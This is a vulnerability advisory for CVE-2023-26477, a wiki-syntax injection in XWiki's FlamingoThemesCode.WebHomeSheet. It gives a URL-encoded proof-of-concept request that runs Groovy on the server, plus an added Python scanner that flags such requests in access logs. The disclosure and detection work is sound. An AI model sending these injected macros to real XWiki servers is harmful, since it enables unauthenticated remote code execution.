CVSS3: 10 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS: 0.003 Low
Percentile: 70.3%
It’s possible to inject arbitrary wiki syntax, including Groovy, Python and Velocity script macros, via the newThemeName request parameter (URL parameter), in combination with the additional parameters form_token=1&action=create.
For instance: http://127.0.0.1:8080/xwiki/bin/view/FlamingoThemesCode/WebHomeSheet?newThemeName=foo%22%2F%7D%7D%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D&form_token=1&action=create will execute the following Groovy code on the server: println("hello from groovy!")
This has been patched in the supported versions 13.10.10, 14.9-rc-1, and 14.4.6.
It is possible to edit FlamingoThemesCode.WebHomeSheet and manually perform the changes from the patch fixing the issue.
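To check whether an unpatched instance has received requests of the shape described above, the following added example (not part of the advisory or of XWiki's code) scans web access logs for a newThemeName value on FlamingoThemesCode/WebHomeSheet that contains wiki macro delimiters. It assumes combined-format access logs; the function names are hypothetical and the sample log lines are constructed, with the second one reusing the advisory's own example URL.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Client address and request target of a combined-format log entry (assumed format).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SHEET = "FlamingoThemesCode/WebHomeSheet"  # page named in the advisory
MACRO_RE = re.compile(r"\{\{|\}\}")         # XWiki macro delimiters

def suspicious_theme_name(log_line):
    """Return (client, decoded newThemeName) if the value carries macro syntax, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    # Decode the path too, so a percent-encoded page name is still recognised.
    if SHEET not in unquote(url.path):
        return None
    # parse_qs percent-decodes each value before the delimiter check.
    for value in parse_qs(url.query, keep_blank_values=True).get("newThemeName", []):
        if MACRO_RE.search(value):
            return client, value
    return None

def scan(lines):
    """Return every hit found in an iterable of log lines."""
    return [hit for hit in map(suspicious_theme_name, lines) if hit]

# Constructed sample entries: benign theme creation, the advisory's example
# request, and macro-like text sent to an unrelated page.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Mar/2023:10:00:00 +0000] "GET /xwiki/bin/view/FlamingoThemesCode/WebHomeSheet?newThemeName=Ocean&form_token=abc&action=create HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Mar/2023:10:00:05 +0000] "GET /xwiki/bin/view/FlamingoThemesCode/WebHomeSheet?newThemeName=foo%22%2F%7D%7D%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D&form_token=1&action=create HTTP/1.1" 200 733',
    '192.0.2.12 - - [01/Mar/2023:10:00:09 +0000] "GET /xwiki/bin/view/Sandbox/WebHome?newThemeName=%7B%7Bx%7D%7D HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client}: newThemeName={value!r}")
```

Only parameters carried in the URL query string appear in access logs, so this check covers the URL-parameter form the advisory describes and nothing sent in a request body.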
If you have any questions or comments about this advisory:
github.com/advisories/GHSA-x2qm-r4wx-8gpg
github.com/xwiki/xwiki-platform/commit/ea2e615f50a918802fd60b09ec87aa04bc6ea8e2#diff-e2153fa59f9d92ef67b0afbf27984bd17170921a3b558fac227160003d0dfd2aR283-R284
github.com/xwiki/xwiki-platform/security/advisories/GHSA-x2qm-r4wx-8gpg
jira.xwiki.org/browse/XWIKI-19757
nvd.nist.gov/vuln/detail/CVE-2023-26477